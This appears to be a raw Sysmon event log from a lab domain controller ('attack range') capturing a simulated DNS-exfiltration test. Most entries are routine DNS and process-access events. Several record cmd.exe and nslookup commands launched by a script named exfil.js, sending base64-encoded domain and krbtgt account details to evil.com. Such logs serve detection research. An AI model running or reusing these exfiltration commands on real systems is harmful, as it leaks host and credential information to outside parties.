process>-udptruefalse127.0.0.1-51271-false127.0.0.1-53domain 354300x8000000000000000215588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.532{00000000-0000-0000-0000-000000000000}7408<unknown process>-udptruefalse127.0.0.1-51269-false127.0.0.1-53domain 354300x8000000000000000215587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.531{00000000-0000-0000-0000-000000000000}7408<unknown process>-udptruefalse127.0.0.1-51268-false127.0.0.1-53domain 354300x8000000000000000215586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.470{00000000-0000-0000-0000-000000000000}7240<unknown process>-udpfalsefalse127.0.0.1-51266-false127.0.0.1-53domain 354300x8000000000000000215585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.470{00000000-0000-0000-0000-000000000000}7240<unknown process>-udptruefalse127.0.0.1-51266-false127.0.0.1-53domain 354300x8000000000000000215584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.470{00000000-0000-0000-0000-000000000000}7240<unknown process>-udpfalsefalse127.0.0.1-51265-false127.0.0.1-53domain 354300x8000000000000000215583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.470{00000000-0000-0000-0000-000000000000}7240<unknown process>-udptruefalse127.0.0.1-51265-false127.0.0.1-53domain 354300x8000000000000000215582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{00000000-0000-0000-0000-000000000000}6432<unknown process>-udpfalsefalse127.0.0.1-51264-false127.0.0.1-53domain 354300x8000000000000000215581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{00000000-0000-0000-0000-000000000000}6432<unknown process>-udptruefalse127.0.0.1-51264-false127.0.0.1-53domain 354300x8000000000000000215580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{00000000-0000-0000-0000-000000000000}6432<unknown process>-udpfalsefalse127.0.0.1-51263-false127.0.0.1-53domain 354300x8000000000000000215579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{00000000-0000-0000-0000-000000000000}6432<unknown process>-udptruefalse127.0.0.1-51263-false127.0.0.1-53domain 354300x8000000000000000215578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{00000000-0000-0000-0000-000000000000}6432<unknown process>-udpfalsefalse127.0.0.1-51262-false127.0.0.1-53domain 354300x8000000000000000215577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.392{00000000-0000-0000-0000-000000000000}6432<unknown process>-udptruefalse127.0.0.1-51262-false127.0.0.1-53domain 354300x8000000000000000215576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.298{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-51261-false127.0.0.1-53domain 354300x8000000000000000215575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.298{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-51261-false127.0.0.1-53domain 354300x8000000000000000215574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.298{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-51260-false127.0.0.1-53domain 354300x8000000000000000215573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.298{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-51260-false127.0.0.1-53domain 354300x8000000000000000215572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.297{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-51259-false127.0.0.1-53domain 354300x8000000000000000215571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.297{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-51259-false127.0.0.1-53domain 10341000x8000000000000000215570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5846-000000005F02}5720C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000215569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.221{00000000-0000-0000-0000-000000000000}6008<unknown process>-udpfalsefalse127.0.0.1-51258-false127.0.0.1-53domain 10341000x8000000000000000215568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5746-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.206{2E1864BB-18E0-629A-6742-000000005F02}39766716C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-5746-000000005F02}4816C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.210{2E1864BB-18FF-629A-5746-000000005F02}4816C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxeg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.205{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhjudb.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.168{2E1864BB-18FF-629A-5546-000000005F02}22565544C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5646-000000005F02}8156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.152{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5646-000000005F02}8156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.152{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.152{2E1864BB-18FF-629A-5446-000000005F02}6156336C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-5646-000000005F02}8156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.163{2E1864BB-18FF-629A-5646-000000005F02}8156C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-5446-000000005F02}6156C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhjudb.tmp 2>&1 10341000x8000000000000000215552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.137{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5546-000000005F02}2256C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.137{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-5546-000000005F02}2256C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{2E1864BB-18FF-629A-5546-000000005F02}22565544C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-5446-000000005F02}6156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.121{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5546-000000005F02}2256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.105{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.105{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.105{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.105{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.105{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-5446-000000005F02}6156C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 